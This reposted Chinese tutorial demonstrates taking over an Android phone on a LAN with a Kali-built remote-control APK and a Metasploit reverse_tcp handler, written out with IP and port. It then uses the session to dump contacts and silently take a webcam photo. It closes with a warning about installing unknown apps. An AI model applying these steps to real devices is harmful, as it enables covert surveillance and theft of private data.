专栏首页黑客网络技术如何攻击同一局域网的其他设备

如何攻击同一局域网的其他设备

远控生成

1、先说点废话,来确认下 Kali 虚拟机配置好的IP地址:

2、在 Kali 终端输入以下命令在 Kali 虚拟机/root路径下生成远控文件520.apk

传输远控

远控文件已经生成了,但如何从 Kali 虚拟机传输到 Win10 物理主机并进一步传输到受害者手机呢?

1、使用Xshell远程连接工具,新建如下SFTP协议的文件传输会话:

2、同时配置好与远程 Kali 主机对接的本地文件夹,用于 Win 10 主机传输文件的默认存放路径:

3、输入 kali 主机的账户和密码进行登陆并成功连接后,使用命令get 520.apk从Kali 主机下载远控文件到本地文件夹D:\Code下:

4、在 Win 10 主机本地文件夹确认下文件是否下载成功:

安装远控

1、再废话一下,查看并确认华为测试手机的IP地址与 Kali 虚拟机、Win 10主机在同一网段内:

2、在 Kali 虚拟机里查看能否连通手机(这是后续攻击成功的基础):

3、在 Win 10 主机打开QQ程序,向华为手机发送远控文件并安装(这个就不用演示了吧…),安装后如下:

开始测试

MSF监听

Kali 终端依次执行以下命令:

msfconsole                //启动msfconsole
use exploit/multi/handler //加载模块set payload android/meterpreter/reverse_tcp //选择Payloadset lhost 192.168.0.199  //这里的地址设置成我们刚才生成木马的IP地址set lport 9999           //这里的端口设置成刚才我们生成木马所监听的端口
exploit                  //开始执行漏洞,开始监听,等待手机上线123456

1、在 Kali 终端输入msfconsole命令启动Metasploit框架:

2、依次以下执行命令加载攻击模块、选择Payload、设置本地监听主机的IP和端口:

3、执行命令exploit,开始执行攻击程序,进入监听状态,等待目标手机上线(用户点击远控程序):

4、此时手动点击刚才手机中安装的MainActivity程序图标(没有界面),则可成功建立攻击会话:

5、此时输入help命令可查看具体的攻击命令和描述,后面将选择几个进行演示:

命令行执行

成功建立攻击会话后可以对受害者手机进行像Linux主机shell一样对手机进行命令执行操作:

通讯录下载

1、在攻击会话中执行dump_contacts命令导出受害者手机通讯录里的信息到 Kali 虚拟机/root路径下:

2、在虚拟机中查看一下导出来的通讯录文件:

3、同理可导出受害者手机中的短信记录、通话记录……但是此手机没有插手机卡(穷……),故此处不做演示了。

摄像机拍摄

在攻击会话中执行命令webcam_snap ,可开启受害者的摄像头自动拍摄一张照片并保存到Kali 虚拟机中:

同理还可以非法调用受害者手机的录音功能、屏幕截图功能……

至此,本次Kali系统生成远控程序后控制局域网内Android手机的演示结束,其他控制操作读者有兴趣的话可自行借助help命令给出的使用命令描述进行体验。

温馨提醒:此次演示中的远控程序没有图形化界面的伪装,真实的环境中攻击者会将其伪装得跟正常软件一样,这提醒了我们不要轻易安装安全性未知的软件,同时不要轻易连接公共WIFI,让自己的设备暴露在攻击者搭建的局域网。

本文分享自微信公众号 - 黑客网络技术(Hacker202101),作者:Mr wang

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2021-01-10

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 局域网中的设备是如何通讯的

    2、网关会给每个局域网中的设备分配一个ip地址,ip有ipv4和ipv6,这里使用ipv4来演示。

    挥刀北上
  • 如何入侵同一局域网的电脑

    我和另一台电脑同在一个局域网下,对方IP已知,用户名和密码未知。 想用灰鸽子或其他方法控制(或以其他的方式入侵)那台电脑。 我和对方的操作系统是XP。已经有的...

    知识与交流
  • 无线安全系列 1.3 熟悉Wi-Fi攻击工作流程

    本文由 玄魂工作室 power-li 根据《building a pentesting lab for wireless network》翻译修改而来

    用户1631416
  • 无线安全系列 1.3 熟悉Wi-Fi攻击工作流程

    本文由 玄魂工作室 power-li 根据《building a pentesting lab for wireless network》翻译修改而来

    7089bAt@PowerLi
  • IE 浏览器 DOM 树结构概览(上)

    DOM 作为现代浏览器的基础,其设计和实现方式影响着整个浏览器的表现。对安全研究者而言,了解DOM 的结构更是有着特殊的意义。在对 DOM 结构有了了解之后进行...

    腾讯玄武实验室
  • 网络分段如何网络系统帮助企业家应对勒索软件风险

    几个月前,我们的孩子所在的南卡罗来纳州最大的学区之一的,网络系统受到了携带病毒的勒索软件的攻击,这个“ 勒索软件”是一种恶意软件,攻击者通过加密获取访问权限的数...

    用户2652502
  • 如何构建有助于提高IT安全性的网络架构

    多年前,网络安全实践模仿了中世纪的领主,他们依靠坚固的城堡墙来保护他的内在王国。城堡防御设计围绕固定防渗墙,而攻击者依靠他们突破围墙的能力,他们的士兵将通过外露...

    C4rpeDime
  • 如何让局域网内的其他人访问到自己在Tomcat上部署的项目

     学JSP第三节课,今天老师上课讲了开启Tomcat之后,将自己电脑的文件放到指定的目录下,可以让同宿舍的人访问并且下载,老师只是提了一下,没有具体讲,后来我看...

    mathor
  • 协议森林16 小美的桌号(DHCP协议)

    作者:Vamei 出处:http://www.cnblogs.com/vamei 严禁任何形式转载。

    Vamei
  • 协议森林16 小美的桌号(DHCP协议)

    DHCP协议用于动态的配置电脑的网络相关参数,如主机的IP地址,路由器出口地址、DNS域名服务器地址等。一台电脑只要接上网,就可以通过DHCP协议获得相关配置,...

    Vamei
  • 原创 | 私有5G网络的威胁分析

    随着越来越多的国家开始布局5G网络,5G时代的浪潮终于拉开大幕。当5G网络成熟商用之后,不仅提高了网络速度和带宽,更具有革新各种关键领域的潜力,如物联网(IoT...

    绿盟科技研究通讯
  • 【腾讯 TMQ 】WIFI 安全测试,其实不难

    作为WiFi安全的一部分,近年来WiFi安全事件层出不穷,而其中的ARP攻击事件更加普遍,越来越成为移动互联网时代手机用户的一大痛点。本文主要讲解WIFI的安全...

    腾讯移动品质中心TMQ
  • 当我家咖啡机管我要赎金的时候,我就知道IoT还是不怎么靠谱

    一旦被冠上“智能”这个名字,似乎所有的电器、产品都比之前传统的产品更有价值更聪明。

    大数据文摘
  • 2019年应当认真对待的6大移动安全威胁

    移动端的恶意软件,在近年来愈发频繁的出现在了网络世界中,随着安全威胁的升级,越来越多的企业或组织也开始重点关注这些问题。

    FB客服
  • FIT 2019 收官日主论坛全记录,明年再见!

    今天的大会主论坛包含「WIT2018现场最受欢迎奖颁奖」和「前沿安全神盾局」两大主题,此外独立分设「白帽LIVE」及 「企业安全俱乐部」两大分论坛,与来自全球的...

    FB客服
  • 使用浏览器作为代理从公网攻击内网

    在 Forcepoint,我们不断寻求改善我们产品所提供的防护。为此,我们经常研究不寻常或潜在新颖的攻击技术。最近的一个研究课题是从公网发起的针对 localh...

    madneal
  • 腾讯黑入Echo,远程控制、窃听、录音,智能音箱真的不安全了!

    腾讯Blade团队现场演示了如何黑入亚马逊Echo音箱——窃听、录音,甚至将录音文件通过网络发送给远程服务器。

    新智元
  • 俄建立网军将大幅提升网络战能力

    俄罗斯国防部副部长奥斯塔边科近日发表声明,今年年底俄罗斯将建立一个新的兵种,也就是网络安全部队,它的主要任务是向网络威胁作斗争,包括“猎捕”有害的软...

    安恒信息
  • ARP,这个隐匿在计网背后的男人

    只要确定了 IP 地址后,就能够向这个 IP 地址所在的主机发送数据报,这是我们所熟知的事情。但是再往深了想,IP 地址只是标识网络层的地址,那么在网络层下方数...

    用户8611941

扫码关注云+社区

领取腾讯云代金券